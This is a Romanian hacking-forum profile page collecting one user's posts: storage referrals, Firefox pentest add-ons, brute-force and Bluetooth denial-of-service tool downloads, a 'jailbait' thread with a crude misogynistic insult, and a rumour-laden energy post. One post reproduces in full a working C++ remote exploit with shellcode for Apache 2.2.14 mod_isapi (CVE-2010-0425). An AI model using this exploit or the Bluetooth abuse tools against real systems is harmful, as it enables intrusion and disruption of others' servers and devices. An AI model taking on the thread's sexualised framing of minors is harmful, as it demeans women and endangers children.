Jump to content

begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. Am ceva mai bun decat un tracker. Ati avut nevoie vreodata sa stocati online, pe perioada nelimitata, gratuit, un numar nelimitat de GB ? Ba mai mult: criptat AES-256 (cel mai inalt standard de securitate in prezent) viteza de transfer depinde doar de conexiunea ta la net. Va prezint wuala. urcati pe contul vostru ce vreti, am deja un grup creat cu multe fisiere, va dau acces maine si revin cu detalii. faceti cont cu linkul urmator, aveti 1 gb in plus la start. http://www.wuala.com/en/referral/7N6KCHG7JMPGAAK7MCFK
  2. demon_zone ce-ti bati ma joc ? plm, nu votati aiurea, voiam sa va fac ceva !
  3. Ma intereseaza dimensiunile, numarul de stickuri si marca lor. Bifati in poll ce dimensiuni au, in caz ca aveti mai multe de aceeasi marime lasati un post. just leave a reply ! //ty neme
  4. asa, si care e pretul tau "...de romania" ?
  5. begood

    jailbait

    da' ce pl conteaza daca is chinezoaice/bulgaroaice sau romance ? is pizde. aceleasi gene, acelasi rahat, ca noi toti.
  6. begood

    jailbait

  7. <em:minVersion>1.5</em:minVersion> <em:maxVersion>3.*</em:maxVersion> merge instalat. am gresit eu mai sus. am reusit, nu trebuie editat nimic. doar click dreapta save as, fireforce.xpi => click dreapta open -> firefox.
  8. begood

    vand acces

    rootkit ghici.
  9. vad ca nu merge, probabil ca nu e compatibil cu ultima versiune de firefox. va informez daca apare vreun update. https://addons.mozilla.org/en-US/firefox/addon/64765 site-ul lor : http://www.scrt.ch/pages_en/fireforce.html merge pana la firefox 3.5.x
  10. This was long overdue! FireFox is a great too and we use it for some part of our vulnerability assessment and penetration tests when we have to get a different perspective. We have been using these FireFox add-on’s and have been updating them as soon as we find an add-on that could be added to our favourite’s list. Some of these add-on’s can also be used for minimal code reviews too! We thought that we could share it with you guys! Here it is: PenTestIT.Com’s WAPT Add-ons! As of 07th March 2010, there are 37 add-ons. This is a list of the same: 1 Fireforce: Brute-force attacks on GET or POST forms. 2 XSites: This extension will show users all the hosts involved in loading the current page in an unobtrusive way. The purpose is to aware users of cross site requests. Such awareness could be translated into awareness of cross site attacks, or awareness of third party traffic tracking such as the use of Google-analytics, or awareness of ad network. 3 Groundspeed: Groundspeed is an add-on that allows security testers to manipulate the application user interface to eliminate annoying limitations and client-side controls that interfere with the web application penetration tests. 4 Modify Headers: Add, modify and filter http request headers. You can modify the user agent string, add headers to spoof a mobile request (e.g. x-up-calling-line-id) and much more. 5 SHODAN Computer Search: SHODAN Computer Search Engine. 6 A user-friendly interface to SHODAN: Created by guelfoweb. 7 HackBar: Simple security audit / Penetration test tool. 8 CookieSwap: CookieSwap enables you to easily swap all your cookies so that you can be logged in to multiple web e-mail accounts (like Gmail and Yahoo! mail) as different users at the same time and quickly switch between them. Note: When swapping profiles with CookieSwap, the cookies in all tabs and all browser windows are changed at the same time. This means that your web login to sites like Gmail will change in all the tabs at once. 9 Cert Viewer Plus: Certificate viewer enhancements: PEM format view, file export, trust configuration. 10 Offsec Exploit-db Search: This plugin lets you search on Offsec Exploit archive – Offensive Security Training presents - The Exploit Database. Offsec Exploit archive, also known as Explo.it, is the replacement of Milw0rm archive. 11 DNS Unpinning: The DNSUnpinning Firefox extension provides an option in the Tools menu to disable or enable DNS caching/pinning. This extension may be useful to Web application developers, Web application security researchers, and perhaps the occasional system/network administrator of a load-balanced Web service. The extension creates the network.dnsCacheEntries preferences option and sets it to zero at browser startup, and a Tools menu item can set and clear this preference option. 12 Inline Code Finder for Firebug: Inline Code Finder is an add-on to Firebug, to be able to find HTML elements with any of the below issues: * Inline JavaScript events * Inline style * javascript: links 13 PassiveRecon: PassiveRecon provides information security professionals with the ability to perform “packetless” discovery of target resources utilizing publicly available information. 14 User Agent Switcher: The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of the browser. 15 JavaScript Deobfuscator: This add-on will show you what JavaScript gets to run on a web page, even if it is obfuscated and generated on the fly. Simply open JavaScript Deobfuscator from the Tools menu and watch the scripts being compiled/executed. 16 Show Location: Show the server location of the current page in the status bar. 17 View Dependencies: View Dependencies adds a tab to the Page Info window, in which it lists all the files which were loaded to show the current page. 18 BetterPrivacy: Ever wondered why you are still tracked though you tried everything to prevent it? BetterPrivacy is a safeguard which protects from usually not delete-able LSO’s on Google, YouTube, Ebay… 19 Check4Change: Check4Change (aka C4C) is a simple extension that allows you to periodically check a web-page for updates… 20 TestGen4Web: Just like your VCR – for Firefox. It records what you do, stores it, and plays it back on demand. 21 ASNumber: The AS Number Extension displays interesting information the Internet Service Provider of every website visited. Along with it come some additional statistics for those who want to know what happens behind the Webs shiny surface. 22 Access-Me: Access vulnerabilities in an application can allow an attacker to access resources without being authenticated. Access-Me is a Firefox extension used to test for Access vulnerabilities. 23 SQL Injection: SQL Injection is an Upgrade from the old form free, it is a component to transform checkboxes, radio buttons, select elements to a input text and enable disabled elements from all forms in a page. It makes easier to test and identify SQL injection vulnerabilities in web pages. 24 Advanced Dork: Advanced Dork: gives quick access to Google’s Advanced Operators directly from the context menu… 25 xmpp4moz: xmpp4moz integrates the XMPP protocol (also known as Jabber) into Mozilla applications. 26 UrlParams: Shows you the GET and POST parameters of the current website in the sidebar… 27 RESTTest: Construct custom HTTP requests to directly test requests against a server. RESTTest uses the XmlHttpRequest object and allows you to simulate XHR to quickly prototype requests and test security problems. Designed specifically for working with REST sources, supporting all HTTP methods. 28 HttpFox: An HTTP analyzer add-on for Firefox 29 Regular Expressions Tester: Testing tool for regular expressions with color highlighting (including sub-matches) and helpers for creating expressions 30 JSView: All browsers include a “View Source” option, but none of them offer the ability to view the source code of external files. Most websites store their JavaScript’s and style sheets in external files and then link to them within a web page’s… 31 XSS Me: Cross-Site Scripting (XSS) is a common flaw found in today’s web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process will help protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities. 32 SQL Inject Me: SQL Injection vulnerabilities can cause a lot of damage to a web application. A malicious user can possibly view records, delete records, drop tables or gain access to your server. SQL Inject-Me is Firefox Extension used to test for SQL Injection vulnerabilities. 33 ShowIP: Show the IP address(es) of the current page in the status bar. It also allows querying custom information services by IP (right mouse button) and hostname (left mouse button), like whois, netcraft. Additionally you can copy the IP address to the clipboard. 34 Greasemonkey: Allows you to customize the way a webpage displays using small bits of JavaScript. 35 Firebug: Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page… 36 Live HTTP Headers: View HTTP headers of a page and while browsing. 37 Tamper Data: Use tamperdata to view and modify HTTP/HTTPS headers and post parameters… As mush as possible, we have tried keeping the number of add-on’s performing the same task minimal. We also know that some of these add-on’s are for “older versions of FireFox”. But well, we normally “Ignore version check”. So, yeah! We will be updating our collection as and when we find a new add-on that can aid us in our endeavors! https://addons.mozilla.org/en-US/firefox/collection/pentestit
  11. GnuPG is the GNU project's complete and free implementation of the OpenPGP standard as defined by RFC4880 . GnuPG allows to encrypt and sign your data and communication, features a versatile key managment system as well as access modules for all kind of public key directories. GnuPG, also known as GPG, is a command line tool with features for easy integration with other applications. In this video, Hugo Mills gives a short talk on GnuPG, a Free Software PGP replacement. This talk also covers some basic cryptography principles, but doesn't involve any mathematics! See HantsLUG Wiki: TechTalks for more details. This talk was given at the Hampshire Linux User Group (HantsLUG) meeting on 2nd February 2008 at Southampton University. Practical Cryptography using GnuPG Tutorial
  12. One Click A Day For PC Maintenance! Keeps Any PC Problems Away! With millions of worldwide users, the first-rank & free Glary Utilities is an INDISPENSABLE friend for your PC, with its 100% safe, thorough & quick cleaning and worry-free restoration. Glary Utilities is a freeware with registry and disk cleaning, privacy protection, performance accelerator and amazing multifunctional tools. It can fix registry errors, wipe off clutters, optimize internet speed, safeguard confidential files and maintain maximum performance. This is a all in one tool for everyone! Daily, we face a lot of issues of slow PC machine and get frustrated! This tool is very helpful. We have talked about tools with similar functionality but for some reasons we like to try new things in search of better option. It is designed for both novice and professionals. User-friendly interface shows clear & detailed directions. For novice, all work can be done with just 1 or 2 clicks, while for professionals, abundant options are available. Features of Glary Utilities: - Optimize, clean and boost the speed of your Windows. - Protect your privacy and security. - Block spyware, trojans, adware, etc. - Fix certain application errors. - Simple, fast and User friendly interface - Clean Up & Repair - Optimize & Improve - Privacy & Security - Files & Folders - System Tools Operating systems supported: Windows 7, 2000, XP, Vista 32/64bit download Glary Utilities - Reviews and free Glary Utilities downloads at Download.com
  13. Fireforce is a Firefox extension designed to perform brute-force attacks on GET and POST forms Fireforce can use dictionaries or generate passwords based on several character types. Attacks can be performed on two separate fields using two distinct password sources. download http://www.scrt.ch/outils/fireforce/fireforce.xpi documentation http://www.scrt.ch/outils/fireforce/fireforce_en_manual.pdf
  14. Un studiu facut la americani (in 2004) arata ca 70% din oameni si-ar impartasi parola pe un baton de ciocolata. De asemenea 34% ar spune-o "pe gratis". Studiul a fost facut in Olympia London in perioada 27-29 Aprilie. Voi mi-ati da parola de la computer pe un baton de cioco ? Vote now ! Tomorrow will be 2 late, no mor cioco sursa
  15. 800-900 ron
  16. un duet ? neme&pax4ev?
  17. Due to the nature of the vulnerability, and exploitation method, DEP should be limited to essential Windows programs and services. At worst, if DEP is enabled for the Apache process, you could cause a constant DoS by looping this (since apache will automatically restart). /* * Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit (CVE-2010-0425) * ------------------------------------------------------------------------------ * * Advisory: http://www.senseofsecurity.com.au/advisories/SOS-10-002 * * Description: * pwn-isapi.cpp exploits a dangling pointer vulnerabilty in Apache 2.2.14 mod_isapi. * Due to the nature of the vulnerability, and exploitation method, DEP should be limited to essential * Windows programs and services. At worst, if DEP is enabled for the Apache process, you could cause * a constant DoS by looping this (since apache will automatically restart) * * Note that the exploit code may need to be run multiple times before a shell is spawned (70% * success rate - tested on three different systems). Furthermore, the exploit code may require * modification to exploit this vulnerability on different platforms. This is due to loaded memory * references to the unloaded DLL (they will be different for each ISAPI module). Do not test * this code in a VM otherwise the code may fail to send the RESET packet (something to do with * VMware gracefully closing the connection, instead of sending a RESET packet) - I didnt want * to have to use raw packets on Windows. * * Shellcode Note: * The shellcode writes "pwn-isapi" to "sos.txt" which is created in the current working directory. * Most operating systems should be supported by this shellcode. I've used Skylined's method of finding * the base address of kernel32.dll for Windows 7 and modified it so that it will find the base * address of msvcrt.dll instead. I've also added another check so that it will be able to detect * "msvcrt.dll" on Windows Server 2003 (this OS loads msvcrt.dll in 5th position, and before this * DLL string is read, another DLL (RPCRT4.dll) length is verifiied which matches the length of * msvcrt.dll. So the added check will verify the presents of "m" before proceeding. * * Author: * Brett Gervasoni (brettg [at] senseofsecurity.com.au) * * Copyright Sense of Security Pty Ltd 2010. * http://www.senseofsecurity.com.au */ #include <iostream> #include <windows.h> #include <winsock.h> #include <string> #include <direct.h> #pragma comment(lib, "wsock32.lib") using namespace std; #define SERVER_PORT 80 void header(); int createConnection(string targetAddr, int targetPort); int sendTransmission(string message); string recvTransmission(); void cleanUp(); WORD sockVersion; WSADATA wsaData; int sock; struct sockaddr_in rserver; int main(int argc, char *argv[]) { string serverIP, isapiDLL; string triggerVuln, payload; char accept[171], referer[733], cookie[5376], random[7604], postData[23379], footer[299]; //custom shellcode that writes "pwn-isapi" to "sos.txt" in the current working directory //Note: There are four NOPs at the end for padding. Not really needed. char shellcode[] = "\x31\xc0\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x56\x08\x8b" "\x7e\x20\x8b\x36\x66\x39\x4f\x14\x75\xf2\x66\xb9\x01\x6d\x66\x81\xe9\x94" "\x6c\x66\x39\x0f\x66\x89\xc1\x75\xe1\x89\xe5\xeb\x71\x60\x8b\x6c\x24\x24" "\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" "\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1" "\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb\x66" "\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61" "\xc3\xad\x50\x52\xe8\xaa\xff\xff\xff\x89\x07\x66\x81\xc4\x0c\x01\x66\x81" "\xec\x04\x01\x66\x81\xc7\x08\x01\x66\x81\xef\x04\x01\x39\xce\x75\xde\xc3" "\xeb\x10\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8\xcd\xff\xff\xff\xeb\x3b" "\xe8\xeb\xff\xff\xff\x6e\x7c\x2e\xe1\x1e\x3c\x3f\xd7\x74\x1e\x48\xcd\x31" "\xd2\x58\x88\x50\x07\xeb\x2f\x31\xd2\x59\x88\x51\x01\xeb\x2e\x51\x50\xff" "\x55\x04\xeb\x2c\x31\xd2\x59\x88\x51\x09\xeb\x33\x51\x50\x89\xc6\xff\x55" "\x08\x53\xff\x55\x0c\xe8\xd1\xff\xff\xff\x73\x6f\x73\x2e\x74\x78\x74\x4e" "\xe8\xcc\xff\xff\xff\x77\x4e\xe8\xcd\xff\xff\xff\xe8\xcf\xff\xff\xff\x70" "\x77\x6e\x2d\x69\x73\x61\x70\x69\x4e\xe8\xc8\xff\xff\xff\x90\x90\x90\x90"; header(); if (argc < 3) { printf("usage: %s <ip> <DLL>\n", argv[0]); return 1; } serverIP = string(argv[1]); isapiDLL = string(argv[2]); //all these values could be set to 7601 + sizeof(shellcode) //but mixing it up is good. memset(accept, 'A', 170); memset(referer, 'A', 732); memset(cookie, 'A', 5375); memset(random, 'A', 7603); memset(postData, 'A', 23378); memset(footer, 'A', 298); triggerVuln = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n" "User-Agent: AAAAAAAA\r\n" "Pragma: no-cache\r\n" "Proxy-Connection: Keep-Alive\r\n" "Host: " + serverIP + "\r\n" "Content-Length: 40334\r\n\r\n" + string(footer); //Modify the below request if needed (depending on where your function pointer is pointing) //Do so by adding or removing headers. So if you want to hit a higher function pointer, //keep adding headers //Note: If performing this blindly, try it a few times, change a bit, try again. //During testing i found that using a chunk of data the same size with the same header name //was more unreliable. In memory, large amounts of nulls are being placed either side of the //payload. Since the function pointer address was random, by slightly mixing up the size of //each header i would get better results. payload = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n" "Accept: " + string(accept) + "\r\n" "Referer: " + string(referer) + string(shellcode) + "\r\n" "From: " + string(cookie) + string(shellcode) + "\r\n" "Utruvh-guiergher: " + string(cookie) + string(shellcode) + "\r\n" "Accept-Language: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" "Content-Type: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" "UA-CPU: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" "Pragma: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" "User-Agent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n" "Cookie: " + string(cookie) + string(shellcode) + "\r\n" "Host: " + serverIP + "\r\n" "Proxy-Connection: Keep-Alive\r\n" "Okytuasd: " + string(cookie) + string(shellcode) + "\r\n" "Asdasdasdasdasd: " + string(random) + string(shellcode) + "\r\n" "Asdasda: " + string(random) + string(shellcode) + "\r\n" "Sewrwefbui: " + string(random) + string(shellcode) + "\r\n" "Qdfasdernu: " + string(random) + string(shellcode) + "\r\n" "Cdffew-asdf: " + string(random) + string(shellcode) + "\r\n" "Kuiytnb-Ehrf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Lsfergjnuibubiu: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Baefrwerifnhu: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Zdsfno: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Psdfsafn: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Zefwefnuivre-sdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Ivre-sdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Yvasde-sdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Yuionbsdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Yasdasdasdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "asdasdde-sdf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Ertuioert-erf: " + string(cookie) + string(shellcode) + "BBBB" + "\r\n" "Content-Length: 25054\r\n\r\n" + string(postData) + "CCCC" + string(shellcode) + "BBBB" + string(footer); //Setup connection if (createConnection(serverIP, SERVER_PORT) == 1) { printf("- an error occurred connecting to the server\n"); return 1; } printf("[+] Connected to %s.\n", serverIP.c_str()); printf("[+] Setting socket data structure values\n"); int iOptVal; int aiOptVal; struct linger linger_data; //This is meant to set closesocket to do a "graceful close", //however this is not the case when WSACancelBlockingCall() is called. A RESET packet is //sent as a result - Note that if in a vm, for some reason a RESET packet does not get sent. linger_data.l_onoff = 0; linger_data.l_linger = 0; setsockopt(sock, SOL_SOCKET, SO_LINGER, (char*)&linger_data, sizeof(linger_data)); setsockopt(sock, SOL_SOCKET, SO_DONTLINGER, (char*)&linger_data, sizeof(linger_data)); //Set SO_LINGER to 0 so WSACancelBlockingCall() will cause a RESET packet to be sent getsockopt(sock, SOL_SOCKET, SO_LINGER, (char*)&linger_data, &iOptVal); getsockopt(sock, SOL_SOCKET, SO_DONTLINGER, (char*)&linger_data, &aiOptVal); printf(" - SO_LINGER value is set to %ld\n", linger_data.l_onoff); printf(" - SO_DONTLINGER value is set to %ld\n", linger_data.l_linger); printf("[*] Triggering DLL unload\n"); sendTransmission(triggerVuln); Sleep(2000); //Sleep for a bit, otherwise on first run a RESET packet doesn't get sent. WSACancelBlockingCall(); //Cause reset packet response Sleep(2000); //The multiple Sleeps seem to break up stuff a bit, making it more reliable... closesocket(sock); Sleep(2000); WSACleanup(); Sleep(2000); printf("[+] The DLL should be unloaded by now\n"); //Reconnect to deliver payload if (createConnection(serverIP, SERVER_PORT) == 1) { printf("- an error occurred connecting to the server\n"); return 1; } printf("[*] Sending payload\n"); sendTransmission(payload); cleanUp(); printf("[+] Check to see if sos.txt was created...\n"); return 0; } void header() { printf("Apache 2.2.14 mod_isapi Remote SYSTEM Exploit (CVE-2010-0425)\n"); printf("-------------------------------------------------------------\n"); printf(" Brett Gervasoni (brettg [at] senseofsecurity.com.au)\n"); printf(" Copyright Sense of Security Pty Ltd 2010.\n"); } //Setup the server int createConnection(string serverIP, int port) { int result = 0, len = 0; sockVersion = MAKEWORD(1,1); WSAStartup(sockVersion, &wsaData); if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("error: socket()\n"); result = 1; } rserver.sin_family = AF_INET; rserver.sin_port = htons(port); rserver.sin_addr.s_addr = inet_addr(serverIP.c_str()); memset(&rserver.sin_zero, 0, 8); len = sizeof(struct sockaddr_in); if ((connect(sock, (struct sockaddr *)&rserver, sizeof(struct sockaddr_in))) == -1) { perror("error: connect()\n"); result = 1; } return result; } //Send a message int sendTransmission(string message) { int bytes_sent = 0; bytes_sent = send(sock, message.c_str(), message.length(), 0); if (bytes_sent < 0) { perror("error: send()\n"); exit(1); } return bytes_sent; } //Receive a message string recvTransmission() { string result; char *c = new char[1]; int bytes_recv = 0; while (c[0] != NULL) { bytes_recv = recv(sock, c, 1, 0); if (bytes_recv < 0) { perror("error: recv()\n"); //exit(1); } result += c[0]; } return result; } //Clean up the connection void cleanUp() { closesocket(sock); WSACleanup(); }
  18. blog .wordpress.com sau .blogspot.com
  19. Cu o sticl? de ap? ?i 4 ore de soare se pot produce 30KWh energie !!! Destul? energie pentru a alimenta o cas?, cu 10 litrii de ap? de râu se poate alimenta o cas? "mare" 24/7. Catalizatorul care face posibil totul a fost "inventat" de un chimist de la MIT, Dan Nocera. Catalizatorul este pe baza de cobalt si fosfati tranforma apa si dioxidul de carbon in hidrogen si oxigen ! Catalyst could power homes on a bottle of water, produce hydrogen on-site (w/ Video) ---------- Acum dilemele mele : 1. In 4 ore nu poate fi absorbita atata energie de la soare => perpetuum mobile ?!!! sau ceva dincolo de asta ? Aici practic intra putina energie, iese enorm de multa energie. 2. Nu e cumva un plagiat dupa un patent unguresc de prin 78 ? Imi amintesc de un reportaj de Andrei Bacalu care arata cum un ungur a reusit sa faca un motor pe baza de apa, curent si atat, apoi totul a disparut, stiri nu au mai aparut, am tot cautat pe net despre motor si totul e sau musamalizat sau furat patentul si unguru omorat sau a fost vandut patentul la compania asta, Sun Catalyx. Imi pare prea batatoare la ochi asemanarea dintre motorul cu apa si aceast catalizator. Dupa un google am gasit asta : Energia din apa [Arhiva] - Realitatea .NET » FORUM mai exact ma intereseaza : Practic stirea de mai sus e un pas inainte, iar metoda de a tranforma apa in h2 si o2 e ceva "vechi" (2008). Asta-i in contradictie cu ce stiu eu, de motorul din 78-79. LE: am gasit si metoda "veche" care implica o sursa de energie electrica, nu soare. Adevarul: Frunze artificiale produc hidrogen | stiri din ecologie, dezvoltari sustenabile si protectia mediului | green-report
  20. Voi ce ati alege, ce ati ales si de ce. De ce sunteti (ne)multumiti. Vreau pareri, desi tind spre blogger.
  21. begood

    jailbait

    @vic fuck yea !
  22. Description vCardBlaster is a tool designed to abuse the sending of vCards over Bluetooth. It allows the user to send a continual stream of vCards to attempt a Bluetooth DoS or abuse other device recourses. A user can send a specific vCard or allow vCardBalster to send a new generated vCard for each iteration. It also allows for an attack on one or all Bluetooth enabled devices in the area. Download Name: vcardblaster_0.4.tar.gz Size: 4.1 KB MD5: f50cbbe4d2ed6e857b70ddcdedb838e5 Download: Hack From A Cave
  23. Description Blueper is a tool designed to abuse Bluetooth file transferring. It uses ussp-push to transfer files from one device to another. The design of this tool provides several possible end results. One is an annoyance of continual popups of file transfer requests on the remote device. Another, is to write data to a remote device disk without user interaction. It can even lock up or crash some devices. When messing around with file uploads one of my PDAs I notice that the files were being cached before I was prompted to download the file. I decided to test if this effect would cascade, IE it would keep caching files without my interaction. And to my surprise, thats what it did. I let the file uploads run till the disk was full on the device and found that the device could no longer operate properly with such limited disk space. I was unable to find where the cached files were located and had to do a factory reset to get it up and running again. So the basics of the attack involve uploading files to a cache without end user interaction. If the attack goes on long enough, they could be forced to reset there device. It should be noted that this only works on a select number of devices. If the upload hangs without transferring data, that generally means the end user has to accept the transfer before the file is cached. Download Name: blueper-0.4.tar.gz Size: 4.5 KB< MD5: 23865e0bcb89239b68f57996ad7ff3f4 Download: Hack From A Cave
  24. Description pwntooth (pown-tooth) is designed to automate Bluetooth Pen-Testing. It scans for devices, then runs the tools specified in the pwntooth.conf; included blueper, bluesnarfer, Bluetooth Stack Smasher (BSS), carwhisperer, psm_scan, rfcomm_scan, and vcardblaster. pwntooth is a fully automated "search and destroy" tool for advanced users who wish to run a series of tests against each device in the target area. While there are some pre-configured lines in the pwntooth.conf file, it is mostly designed for users to specify their own pen-testing configuration. pwntooth can be used in conjunction with mant other tools not included in the package. Download Hack From A Cave Name: pwntooth-0.2.2.tar.gz Size: 6.7 MB MD5: a84a2b59a6253f52a2e74cdca000995b
×
×
  • Create New...